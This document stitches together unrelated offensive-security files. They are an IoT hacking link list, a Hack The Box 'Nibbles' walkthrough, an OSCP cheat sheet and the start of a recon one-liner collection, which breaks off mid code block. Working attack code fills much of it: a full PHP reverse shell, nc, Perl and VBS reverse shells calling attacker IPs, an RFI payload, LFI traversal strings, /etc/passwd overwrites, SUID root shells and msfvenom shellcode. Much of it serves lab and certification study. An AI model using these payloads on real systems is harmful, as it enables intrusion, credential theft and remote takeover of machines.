- [Black Hills - Hardware Hacking tag](https://www.blackhillsinfosec.com/tag/hardware-hacking/)
### Tutorials and Technical Background
- [Azeria Lab](https://azeria-labs.com/) - Miscellaneous ARM related Tutorials.
- [JTAG Explained](https://blog.senr.io/blog/jtag-explained#) - A walkthrough covering UART and JTAG bypassing a protected login shell.
- [Reverse Engineering Serial Ports](http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/) - Detailed tutorial about how to spot debug pads on a PCB.
- [UART explained](https://www.mikroe.com/blog/uart-serial-communication) - An in depth explanation of the UART protocol.
## OWASP Resources
- [OWASP Internet of Things Project](https://owasp.org/www-project-internet-of-things/)
- [OWASP Firmware Security Testing Methodology](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
## IoT Hacking Communities
- [IoT Village](https://www.iotvillage.org/)
- [BuildItSecure.ly](http://builditsecure.ly/)
- [Secure Internet of Things Project (Stanford)](http://iot.stanford.edu/people.html)
## Training Available Through ICS-CERT
- https://ics-cert.us-cert.gov/Training-Available-Through-ICS-CERT
## Interesting Blogs
- <http://iotpentest.com/>
- <https://blog.attify.com>
- <https://payatu.com/blog/>
- <http://jcjc-dev.com/>
- <https://w00tsec.blogspot.in/>
- <http://www.devttys0.com/>
- <https://www.rtl-sdr.com/>
- <https://keenlab.tencent.com/en/>
- <https://courk.cc/>
- <https://iotsecuritywiki.com/>
- <https://cybergibbons.com/>
- <http://firmware.re/>
## CTFs Related to IoT's and Embedded Devices
- <https://github.com/hackgnar/ble_ctf>
- <https://www.microcorruption.com/>
- <https://github.com/Riscure/Rhme-2016>
- <https://github.com/Riscure/Rhme-2017>
## YouTube Channels for Embedded hacking
- [Liveoverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
- [Binary Adventure](https://www.youtube.com/channel/UCSLlgiYtOXZnYPba_W4bHqQ)
- [EEVBlog](https://www.youtube.com/user/EEVblog)
- [JackkTutorials](https://www.youtube.com/channel/UC64x_rKHxY113KMWmprLBPA)
- [Craig Smith](https://www.youtube.com/channel/UCxC8G4Oeed4N0-GVeDdFoSA)
## Reverse Enginnering Tools
- [IDA Pro](https://www.youtube.com/watch?v=fgMl0Uqiey8)
- [GDB](https://www.youtube.com/watch?v=fgMl0Uqiey8)
- [Radare2](https://radare.gitbooks.io/radare2book/content/)
## MQTT
- [Introduction](https://www.hivemq.com/blog/mqtt-essentials-part-1-introducing-mqtt)
- [Hacking the IoT with MQTT](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
- [thoughts about using IoT MQTT for V2V and Connected Car from CES 2014](https://mobilebit.wordpress.com/tag/mqtt/)
- [Nmap](https://nmap.org/nsedoc/lib/mqtt.html)
- [The Seven Best MQTT Client Tools](https://www.hivemq.com/blog/seven-best-mqtt-client-tools)
- [A Guide to MQTT by Hacking a Doorbell to send Push Notifications](https://youtu.be/J_BAXVSVPVI)
## CoAP
- [Introduction](http://coap.technology/)
- [CoAP client Tools](http://coap.technology/tools.html)
- [CoAP Pentest Tools](https://bitbucket.org/aseemjakhar/expliot_framework)
- [Nmap](https://nmap.org/nsedoc/lib/coap.html)
## Automobile
- [Introduction and protocol Overview](https://www.youtube.com/watch?v=FqLDpHsxvf8)
- [PENTESTING VEHICLES WITH CANTOOLZ](https://www.blackhat.com/docs/eu-16/materials/eu-16-Sintsov-Pen-Testing-Vehicles-With-Cantoolz.pdf)
- [Building a Car Hacking Development Workbench: Part1](https://blog.rapid7.com/2017/07/11/building-a-car-hacking-development-workbench-part-1/)
- [CANToolz - Black-box CAN network analysis framework](https://github.com/CANToolz/CANToolz)
## Radio IoT Protocols Overview
- [Understanding Radio](https://www.taitradioacademy.com/lessons/introduction-to-radio-communications-principals/)
- [Signal Processing]()
- [Software Defined Radio](https://www.allaboutcircuits.com/technical-articles/introduction-to-software-defined-radio/)
- [Gnuradio](https://wiki.gnuradio.org/index.php/Guided_Tutorial_GRC#Tutorial:_GNU_Radio_Companion)
- [Creating a flow graph](https://blog.didierstevens.com/2017/09/19/quickpost-creating-a-simple-flow-graph-with-gnu-radio-companion/)
- [Analysing radio signals](https://www.rtl-sdr.com/analyzing-433-mhz-transmitters-rtl-sdr/)
- [Recording specific radio signal](https://www.rtl-sdr.com/freqwatch-rtl-sdr-frequency-scanner-recorder/)
- [Replay Attacks](https://www.rtl-sdr.com/tutorial-replay-attacks-with-an-rtl-sdr-raspberry-pi-and-rpitx/)
## Base transceiver station (BTS)
- [what is base tranceiver station](https://en.wikipedia.org/wiki/Base_transceiver_station)
- [How to Build Your Own Rogue GSM BTS](https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/)
## GSM & SS7 Pentesting
- [Introduction to GSM Security](http://www.pentestingexperts.com/introduction-to-gsm-security/)
- [GSM Security 2](https://www.ehacking.net/2011/02/gsm-security-2.html)
- [vulnerabilities in GSM security with USRP B200](https://ieeexplore.ieee.org/document/7581461/)
- [Security Testing 4G (LTE) Networks](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-44con-lte-presentation-2012-09-11.pdf)
- [Case Study of SS7/SIGTRAN Assessment](https://nullcon.net/website/archives/pdf/goa-2017/case-study-of-SS7-sigtran.pdf)
- [Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP](https://github.com/SigPloiter/SigPloit)
- [ss7MAPer – A SS7 pen testing toolkit](https://n0where.net/ss7-pentesting-toolkit-ss7maper)
- [Introduction to SIGTRAN and SIGTRAN Licensing](https://www.youtube.com/watch?v=XUY6pyoRKsg)
- [SS7 Network Architecture](https://youtu.be/pg47dDUL1T0)
- [Introduction to SS7 Signaling](https://www.patton.com/whitepapers/Intro_to_SS7_Tutorial.pdf)
## Zigbee & Zwave
- [Introduction and protocol Overview](http://www.informit.com/articles/article.aspx?p=1409785)
- [Hacking Zigbee Devices with Attify Zigbee Framework](https://blog.attify.com/hack-iot-devices-zigbee-sniffing-exploitation/)
- [Hands-on with RZUSBstick](https://uk.rs-online.com/web/p/radio-frequency-development-kits/6962415/)
- [ZigBee & Z-Wave Security Brief](http://www.riverloopsecurity.com/blog/2018/05/zigbee-zwave-part1/)
## BLE
- [Traffic Engineering in a Bluetooth Piconet](http://www.diva-portal.org/smash/get/diva2:833159/FULLTEXT01.pdf)
- [BLE Characteristics](https://devzone.nordicsemi.com/tutorials/b/bluetooth-low-energy/posts/ble-characteristics-a-beginners-tutorial0) Reconnaissance (Active and Passive) with HCI Tools
- [btproxy](https://github.com/conorpp/btproxy)
- [hcitool & bluez](https://www.pcsuggest.com/linux-bluetooth-setup-hcitool-bluez)
- [Testing With GATT Tool](https://www.jaredwolff.com/blog/get-started-with-bluetooth-low-energy/)
- [Cracking encryption](https://github.com/mikeryan/crackle)
## Mobile security (Android & iOS)
- [Android](https://www.packtpub.com/hardware-and-creative/learning-pentesting-android-devices)
- [Android Pentest Video Course](https://www.youtube.com/watch?v=zHknRia3I6s&list=PLWPirh4EWFpESLreb04c4eZoCvJQJrC6H)
- [IOS Pentesting](https://web.securityinnovation.com/hubfs/iOS%20Hacking%20Guide.pdf?)
## ARM
- [Azeria Labs](https://azeria-labs.com/)
- [ARM EXPLOITATION FOR IoT](https://www.exploit-db.com/docs/english/43906-arm-exploitation-for-iot.pdf)
## Firmware Pentest
- [Firmware analysis and reversing](https://www.youtube.com/watch?v=G0NNBloGIvs)
- [Firmware emulation with QEMU](https://www.youtube.com/watch?v=G0NNBloGIvs)
- [Dumping Firmware using Buspirate](http://iotpentest.com/tag/pulling-firmware/)
## IoT hardware Overview
- [IoT Hardware Guide](https://www.postscapes.com/internet-of-things-hardware/)
## Hardware Tools
- [Bus Pirate](https://www.sparkfun.com/products/12942)
- [EEPROM readers](https://www.ebay.com/bhp/eeprom-reader)
- [Jtagulator / Jtagenum](https://www.adafruit.com/product/1550)
- [Logic Analyzer](https://www.saleae.com/)
- [The Shikra](https://int3.cc/products/the-shikra)
- [FaceDancer21 (USB Emulator/USB Fuzzer)](https://int3.cc/products/facedancer21)
- [RfCat](https://int3.cc/products/rfcat)
- [IoT Exploitation Learning Kit](https://www.attify.com/attify-store/iot-exploitation-learning-kit)
- [Hak5Gear- Hak5FieldKits](https://hakshop.com/)
- [Ultra-Mini Bluetooth CSR 4.0 USB Dongle Adapter](https://www.ebay.in/itm/Ultra-Mini-Bluetooth-CSR-4-0-USB-Dongle-Adapter-Black-Golden-with-2-yr-wrnty-/332302813975)
- [Attify Badge - UART, JTAG, SPI, I2C (w/ headers)](https://www.attify-store.com/products/attify-badge-assess-security-of-iot-devices)
## Hardware Interfaces
- [Serial Terminal Basics](https://learn.sparkfun.com/tutorials/terminal-basics/all)
- [Reverse Engineering Serial Ports](http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/)
### UART
- [Identifying UART interface](https://www.mikroe.com/blog/uart-serial-communication)
- [onewire-over-uart](https://github.com/dword1511/onewire-over-uart)
- [Accessing sensor via UART](http://home.wlu.edu/~levys/courses/csci250s2017/SensorsSignalsSerialSockets.pdf)
### JTAG
- [Identifying JTAG interface](https://blog.senr.io/blog/jtag-explained)
- [NAND Glitching Attack](http://www.brettlischalk.com/posts/nand-glitching-wink-hub-for-root)
|
# Nibbles - Hack the box
![Ae0G8g.png](https://s2.ax1x.com/2019/03/17/Ae0G8g.png)
## Introduction
Target: 10.10.10.75(OS: Linux)
Kali linux: 10.10.16.44
## Information Enumeration
Firstly, detect the open ports:
```
nmap -sT -p- --min-rate 10000 -oA openports 10.10.10.75
```
![Ae19BQ.png](https://s2.ax1x.com/2019/03/17/Ae19BQ.png)
There are not too many open ports, just `80` and `22`. Detect the detailed services of the open ports:
```
nmap -sC -sV -oA services 10.10.10.75
```
![Ae1E90.png](https://s2.ax1x.com/2019/03/17/Ae1E90.png)
Nothing special found. The only clue may be the open port of `80`. To be honest, the box with less open ports is easier in general.
## Exploit
### Http
Access to `http://10.10.10.75`, just a web page of `hello world`.
![Ae0qsA.png](https://s2.ax1x.com/2019/03/17/Ae0qsA.png)
With the first sight, have not found anything special. Open the inspector, a comment can be found. Obviously, `nibbleblog` is quite important to us. Access to `http://10.10.10.75/nibbleblog`:
![Ae0XZt.png](https://s2.ax1x.com/2019/03/17/Ae0XZt.png)
It seems to be a blog demo. Try to access to each hyperlink in the web page, find nothing special. Try to use nikto to explore:
```
nikto -host http://10.10.10.75/nibbleblog/
```
![AeYklt.png](https://s2.ax1x.com/2019/03/17/AeYklt.png)
[`nibbleblog`](http://www.nibbleblog.com/) is an open source blog system which has been widely used. From the above screenshot, some interesting links can be found. And also try to brute force with `gobuster`:
```
gobuster -u http://10.10.10.75/nibbleblog/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
```
Similarly, the directory of `nibbleblog` can be found, just like admin, content, etc. Open the README of the blog:
![AeYynK.png](https://s2.ax1x.com/2019/03/17/AeYynK.png)
The version is `4.0.3`. Google with `nibbleblog 4.0.3 exploit`. Find a [report](https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html) to talk about the exploit of nibbleblog of `4.0.3`.
![AeYRtH.png](https://s2.ax1x.com/2019/03/17/AeYRtH.png)
The research report is detailed. But there is a precondition that you have to obtain admin credentials. Access to login page: `http://10.10.10.75/nibbleblog/admin.php`.
[![AeY5ct.png](https://s2.ax1x.com/2019/03/17/AeY5ct.png)](https://imgchr.com/i/AeY5ct)
Try the password of `123456` and `admin`. Both are not correct. I have even tried to use hydra:
`hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"`
![AetpuV.png](https://s2.ax1x.com/2019/03/17/AetpuV.png)
The hydra result shows that the password is `123456`. But it is not correct. I doubt it has something with the blacklist of `nibbleblog`. Whatever, try to figure out the password. Try `nibbles`. Wow, we are in. You should try every password as more as possible.
As you have logged in. The above report can be used:
1. Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
2. Activate My image plugin by visiting http://10.10.16.44/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
3. Upload PHP shell, ignore warnings
4. Visit http://localhost/10.10.16.44/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.
Upload a reverse shell php file and use nc to listen to port `1234`:
```php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.16.44'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
```
Accomplish the last step, get the user shell!
![AetbKx.png](https://s2.ax1x.com/2019/03/17/AetbKx.png)
![AeNAZ8.png](https://s2.ax1x.com/2019/03/17/AeNAZ8.png)
## Privilege escalation
The next step is to get the root shell. Try to check the kernel of the linux:
![AeNuzn.png](https://s2.ax1x.com/2019/03/17/AeNuzn.png)
The kernel seems quite fresh. It may be hard to find the kernel exploit. Try to check the sudo permission of nibbler: `sudo -l`.
![AeNrdO.png](https://s2.ax1x.com/2019/03/17/AeNrdO.png)
Just as expected, find a file `monitor.sh` with root permission. Try to read the file with:
```
cat /home/nibbler/personal/stuff/monitor.sh
```
![AeUA61.png](https://s2.ax1x.com/2019/03/17/AeUA61.png)
The file seems to be a bash script with several tasks. There is no need to understand the usage of the file. We can just modify the script to obtain root shell. So the script should be modified. As it is not convenient to modify the file in the victim machine directly. `Nc` can be used to send and receive file.
As the sender:
```
nc -w 3 10.10.16.44 1234 < monitor.sh
```
As the receiver:
```
nc -lvnp 1234 > monitor.sh
```
You can change the send and receiver as needed. It is basic skills to transfer files between the victim machine and attack machine. `Nc` is a good tool in linux.
Firstly, `nc` is used to reverse shell:
```
nc -e 10.10.16.44 1111
```
Try to set `nc` listen to `1111`:
![AeaECQ.png](https://s2.ax1x.com/2019/03/17/AeaECQ.png)
There's a problem with the `nc` in the victim machine. `e` option is invalid in the victim machine. May there are some solutions, but I turn to other reverse shell methods right away.
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.44 1234 >/tmp/f
```
Send the `monitor.sh` to the victim machine and make sure to obtain the execution permission:
```
chmod +x monitor.sh
```
Establish the listen to `1234` in Kali linux and execute the `monitor.sh` in the victim machine:
```
sudo ./monitor.sh
```
Here is the root.
![AewPfg.png](https://s2.ax1x.com/2019/03/17/AewPfg.png)
## Conclusion
To be honest, the most difficult challenge of this box is to guess the password of admin of `nibbleblog`. The known vulnerability is not difficult to utilize. To obtain root shell, there are some methods to try. Some specific method cannot be utilized directly. You can try another method. Try harder!
|
# OSCP
### outline
* Information Gathing
* [nmap](#nmap)
* [nikto](#nikto)
* [gobuster](#gobuster)
* [enum4linux](#enum4linux)
* [smbclient](#smbclient)
* [ftp](#ftp)
* [snmpwalker](#snmpwalker)
* Web application
* [LFI](#LFI)
* [RFI](#RFI)
* [WordPress](#WordPress)
* Password Crack
* [john](#john)
* [hydra](#hydra)
* [ncrack](#ncrack)
* Privilege Escalation
* [Linux](#Linux)
* [Windows](#Windows)
* Reverse Shell
* [FreeBSD](#FreeBSD)
* [CGI](#CGI)
* [MySQL](#MySQL)
* [vbs](#vbs)
* [common](#common)
* [BufferOverflow](#BufferOverflow)
* [Others](#Others)
## Information Gathering
### nmap
* scanning open port and server
```
$ nmap ip --top-ports 1000 --open -sV
```
* smb vulnerable
```
$ nmap -v -p 139, 445 --script="smb-vuln-*,samba-vuln-*" 10.11.1.1-254
$ nmap -p 139, 445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.11.1.1
```
* ftp vulnerable
```
$ nmap -p 21 -sV -sC --script="ftp-vuln-*, ftp-anon" 10.11.1.1-254
```
* http vulnerable
```
$ nmap -v -p 139, 445 --script="http-vuln-*" ip
```
### nikto
* web deep scanning
```
$ nikto -host ip
```
### gobuster
* bruteforcing web directory files
```
$ gobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```
### enum4linux
* Windows and Samba systems
```
$ enum4linux -U -o ip
```
### smbclient
* discover directory and os, smb version
```
$ smbclient -L \\DNSname -I ip -N
```
* log in smb server
```
$ smbclient //DNSname/wwwroot -I ip -N
```
### ftp
* try to login as anonymous
```
user: anonymous
pass: anonymous
```
### snmpwalker
```
$ snmpwalk ip -c public -v 2c > result.txt
```
## Web application
### LFI
* ../../../../../etc/passwd%00
* ..%01/..%01/..%01/..%01/..%01/etc/passwd
* ../../../../../etc/passwd%23
%23 equal to MySQL query '?'
* ../../../../../../../../../etc/passwd/././././././.[…]/./././././.
* ../../../../../../../../../boot.ini/………[…]…………
* ../ -> %2e%2e%2f
### RFI
* http://10.11.1.35/addguestbook.php?name=a&comment=b&LANG=http://10.11.0.5/evil.txt
### WordPress
#### wpscan
* find vulnerable
```
$ wpscan -u host
```
#### wpforce
* crack admin's password
```
$ python wpforce.py -si admin -w password-file.txt -u host
```
## Password Crack
### john
first obtain /etc/shadow and /etc/passwd, then
```
$ unshadow passwd.txt shadow.txt > hash.txt
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
### hydra
```
$ hydra -l root -P password-file.txt 10.11.1.219 ssh
```
### ncrack
```
$ ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.35
```
## Privilege Escalation
### Linux
#### enumrate
* get version
```
$ uname -a
$ cat /etc/*-release
```
* service
```
$ ps
```
#### SUID
SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. ex: /etc/passwd
##### Find suid file
```
$ find / -perm -u=s -type f 2>/dev/null
```
##### Famous priv esc entry
* nmap
```
$ nmap --interactive
$ nmap> !sh
```
* find
```
$ touch pentestlab
$ find pentestlab -exec whoami \;
$ find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
```
* vim
```
$ vim.tiny /etc/shadow
# Press ESC key
:set shell=/bin/sh
:shell
```
* bash
```
$ bash -p
```
* less
```
$ less /etc/passwd
!/bin/sh
```
- others
https://gtfobins.github.io/#+suid
#### /ect/passwd rw permission
```
$ cp /etc/passwd /tmp
$ sed -i 's/root:x:0:0:root:\/root:\/bin\/bash/root::0:0:root:\/root:\/bin\/bash/g' /tmp/passwd
$ cat /tmp/passwd > /etc/passwd
```
#### NFS weak permissions
The root_sqaush parameter prevents root access to remote root users connected to the NFS volume. If the "no_root_squash" option turns on then remote users get root permission.
![](https://i.imgur.com/9RROKav.png)
- suid-shell.c
```
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
system("/bin/bash");
return 0;
}
```
* Attack machine
```
$ showmount -e ip
$ mount ip:/ /tmp/
$ gcc suid-shell.c -o /tmp/suid-shell
$ chmod +s /tmp/suid-shell
```
- Victim machine
```
$ cd /tmp
$ ./suid-shell
```
https://touhidshaikh.com/blog/?p=788
#### Services running as root
```
$ netstat -antup
```
![](https://i.imgur.com/80mxh1t.png)
```
mysql> create function do_system returns integer soname'raptor_udf2.so';
mysql> select do_system('id > /tmp/out; chown smeagol.smeagol /tmp/out');
```
![](https://i.imgur.com/phgKwFH.png)
#### Misconfigured sudo permissions
![](https://i.imgur.com/ey7ZoyZ.png)
That shows we can running find, cat, python as sudo.
- find
```
$ sudo find /home -exec sh -i \;
```
- python
```
$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
```
#### Misconfigured cron permissions
```
$ ls -la /etc/cron.d
```
![](https://i.imgur.com/6Ul3oYA.png)
```
$ find / -perm -2 -type f 2>/dev/null
```
![](https://i.imgur.com/1BnB1Dk.png)
It shows some file which can be write.
```
$ cat /tmp/rootme.c
int main(void)
{
setgid(0);
setuid(0);
execl("/bin/sh", "sh", 0);
}
```
```
$ echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;">/usr/local/sbin/cron-logrotate.sh
$ ls -la rootme
$ ./rootme
```
#### User PATH contain "."
Having "." In user path means the user is able to execute **binary/script** from the current directory.
If user path contain "." - program
If user path not contain "." - ./program
Now we found /home/raj/script/shell having suid permissions, and the shell is run a ps program.
```
$ cd /home/raj/script/
$ cp /bin/sh /tmp/ps
$ export PATH=/tmp:$PATH
$ ./shell
```
![](https://i.imgur.com/vFbAj1A.png)
### Windows
#### Information
* get version
```
$ systeminfo
```
* service
```
$ tasklist
```
* show all folder
```
$ dir /a
```
#### psexec
* psexec
```
$ psexec -u alice -p aliceishere "c:\Users\Public\nc.exe" 10.11.0.49 5555 -e cmd.exe
```
#### dnsadmin
If user in "dnsadmin" group/domain, then it can use the below command to priv esc.
First check the user's permission:
```
$ whoami /group
$ net user aaa /domain
```
If it has dnsadmin then:
- attack machine
Generate reverse shell:
```
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=attack_ip LPORT=4444 -f dll > privesc.dll
```
Run smb server:
```
$ sudo python smbserver.py share ./
```
Listen 4444 port:
```
$ nc -lvp 4444
```
- victim machine
```
$ dnscmd victim_ip /config /serverlevelplugindll \\attack_ip\share\privesc.dll
```
Don't forget to restart the dns server:
```
$ sc.exe \\victim_ip stop dns
$ sc.exe \\victim_ip start dns
```
## Reverse Shell
### FreeBSD
```
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
### CGI
```
#!/usr/bin/perl
require '/tmp/t.pl';
```
### MySQL
```
select cmdshell("C:\\nc.exe 10.11.0.186 4444 -e cmd.exe")
```
### vbs
use it to download nc.exe and reverse shell with cscript.
```
$ cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs
&@echo objXMLHTTP.open "GET","http://10.11.0.186/nc.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH
TTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB
.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.
Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.
vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi
le "nc.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA
DOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No
thing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vb
s&@echo objShell.Exec("nc.exe -e cmd.exe 10.11.0.186 4444")>>poc.vbs&cscript.exe poc.vbs"
```
### common
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
## BufferOverflow
### connect to Windows
* Linux
```
$ service ssh start
$ rdesktop -u offsec -p offsec! ip -f
```
* Windows
Open Tools folder, click putty, type linux ip and run.
### Immunity Debugger
* run exe, attach the execute exe
* record EIP address
```
$ cyclic -l 0xEIP
```
* find badchars(see code)
* find return address
find dll, and type e button to observe, then we can search for jmp esp address(gadget).
```
!moma modules
```
### generate shellcode
```
$ msfvenom --platform Windows -a x86 -p windows/adduser USER=aaa PASS=aaa -f python –e x86/shikata_ga_nai -b "\x00\x0a"
```
### send code
```
r.send("GO" + "A"*2006 + p32(gadget) + "\x90" * 8 + buf)
```
## Others
### linux execute jar file
```
$ java -jar xx.jar
```
### unix execute sh error
$'\r': command not found convert win dos to unix, it need to convert win dos to unix.
* dos2unix
```
$ dos2unix xxx.sh
```
### python call bash
```
$ python -c 'import pty;pty.spawn("/bin/bash")'
```
### can't find ifconfig
* ip a
* or try to fix ifconfig:
```
$ whereis ifconfig
$ PATH="$PATH":/sbin
```
### create shell with msfvenom
```
$ msfvenom -p java/shell_reverse_tcp LHOST=ip LPORT=port -f war > reverse.war
```
### escape LimitShell rbash
* edit PATH to escape rbash
```
$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
```
### Lateral movement through WMI
- we already have a root machine, next step is move to other machine in same network.
- http://www.feidao.site/wordpress/index.php/2020/02/14/wmi/
|
# One-Liner-Scripts [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re)
###### Thanks to all who create these Awesome One Liners❤️
----------------------
![image](https://user-images.githubusercontent.com/75373225/180003557-59bf909e-95e5-4b31-b4f8-fc05532f9f7c.png)
---------------------------
# Subdomain Enumeration
**Juicy Subdomains**
```
subfinder -d target.com -silent | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'
```
**from BufferOver.run**
```
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
```
**from Riddler.io**
```
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
**from nmap**
```
nmap --script hostmap-crtsh.nse target.com
```
**from CertSpotter**
```
curl -s "https://certspotter.com/api/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
**from Archive**
```
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
```
**from JLDC**
```
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
**from crt.sh**
```
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```
**from ThreatMiner**
```
curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u
```
**from Anubis**
```
curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com"
```
**from ThreatCrowd**
```
curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com"
```
**from HackerTarget**
```
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com"
```
--------
## Subdomain Takeover:
```
cat subs.txt | xargs -P 50 -I % bash -c "dig % | grep CNAME" | awk '{print $1}' | sed 's/.$//g' | httpx -silent -status-code -cdn -csp-probe -tls-probe
```
```
subjack -w subs -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
```
-------------------------------
## LFI:
```
cat hosts | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"
```
```
